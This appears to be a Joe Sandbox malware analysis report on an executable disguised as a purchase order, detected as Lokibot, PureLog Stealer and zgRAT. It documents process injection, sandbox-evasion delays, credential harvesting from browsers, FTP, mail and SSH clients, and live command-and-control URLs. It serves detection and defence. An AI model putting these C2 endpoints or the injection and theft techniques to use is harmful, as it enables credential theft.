Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Memory allocated: 14D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Memory allocated: 3040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Memory allocated: 2E60000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe TID: 3992	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6188	Thread sleep time: -360000s >= -30000s			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

2_2_00403D74

Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 60000			Jump to behavior

Source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115367429.0000000004281000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
Source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115367429.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115367429.0000000004312000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
Source: aspnet_compiler.exe, 00000002.00000002.3328760940.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115367429.00000000040ED000.00000004.00000800.00020000.00000000.sdmp, rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115367429.00000000041C5000.00000004.00000800.00020000.00000000.sdmp, rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115367429.000000000435A000.00000004.00000800.00020000.00000000.sdmp, rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115367429.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byr
Source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115367429.00000000040A5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %vL+o+HIpxflaQUFdyuioERPAot/W4EM5/xTa5gjxAAAAAGFXntLKgBbAfHB9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKgBbAvotC0B06uz5XPhM/Q42Rw/ZmRbohjLNQAAAAAGFXntLKgBbA55VlonSSerVyzUKNGzyf6daF/3B3nIS/AAAAAEz4eZtavaLAAAAAADd5O

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]

2_2_0040317B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap,

2_2_00402B7C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.2f10000.0.raw.unpack, BATMAN.cs	Reference to suspicious API methods: WriteProcessMemory_API(processInformation.HasanHandle, num9 + 8, bytes, 4, ref bytesWritten)
Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.2f10000.0.raw.unpack, BATMAN.cs	Reference to suspicious API methods: ReadProcessMemory_API(processInformation.HasanHandle, num9 + 8, ref buffer, 4, ref bytesWritten)
Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.2f10000.0.raw.unpack, BATMAN.cs	Reference to suspicious API methods: VirtualAllocEx_API(processInformation.HasanHandle, 0, length, 12288, 64)

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 415000	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 41A000	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 4A0000	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: B08008	Jump to behavior

Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

Jump to behavior

Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe

Queries volume information: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rPedidodecompra__PO20441__ARIMComponentes.exe PID: 2584, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 6128, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000002.00000002.3328760940.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3328760940.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: rPedidodecompra__PO20441__ARIMComponentes.exe, type: SAMPLE
Source: Yara match	File source: 0.0.rPedidodecompra__PO20441__ARIMComponentes.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2086467248.0000000000C42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: rPedidodecompra__PO20441__ARIMComponentes.exe, type: SAMPLE
Source: Yara match	File source: 0.0.rPedidodecompra__PO20441__ARIMComponentes.exe.c40000.0.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: PopPassword		2_2_0040D069
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: SmtpPassword		2_2_0040D069

Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: rPedidodecompra__PO20441__ARIMComponentes.exe, type: SAMPLE
Source: Yara match	File source: 0.0.rPedidodecompra__PO20441__ARIMComponentes.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2086467248.0000000000C42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: rPedidodecompra__PO20441__ARIMComponentes.exe, type: SAMPLE
Source: Yara match	File source: 0.0.rPedidodecompra__PO20441__ARIMComponentes.exe.c40000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	311 Process Injection	1 Disable or Modify Tools	2 Credentials in Registry	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	2 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	13 System Information Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	311 Process Injection	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Deobfuscate/Decode Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	22 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
rPedidodecompra__PO20441__ARIMComponentes.exe	100%	Avira	HEUR/AGEN.1323787
rPedidodecompra__PO20441__ARIMComponentes.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Antivirus Detection	Reputation
dddotx.shop	188.114.96.3	true	true		unknown

Contacted URLs

Name	Malicious	Reputation
https://dddotx.shop/Mine/PWS/fre.php	true	unknown
http://kbfvzoboss.bid/alien/fre.php	true	unknown
http://alphastand.win/alien/fre.php	true	unknown
http://alphastand.trade/alien/fre.php	true	unknown
http://alphastand.top/alien/fre.php	true	unknown
http://dddotx.shop/Mine/PWS/fre.php	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.ibsensoftware.com/	aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	dddotx.shop	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1541288
Start date and time:	2024-10-24 17:01:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	rPedidodecompra__PO20441__ARIMComponentes.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/3@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 84 Number of non-executed functions: 5
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: rPedidodecompra__PO20441__ARIMComponentes.exe

Simulations

Behavior and APIs

Time	Type	Description
11:02:09	API Interceptor	69x Sleep call for process: aspnet_compiler.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	Orden de Compra No. 78986756565344657.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/nwtkd
	Doc 784-01965670.exe	Get hash	malicious	FormBook	Browse	www.launchdreamidea.xyz/bd77/
	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	www.timizoasisey.shop/3p0l/
	BL.exe	Get hash	malicious	FormBook	Browse	www.launchdreamidea.xyz/bd77/
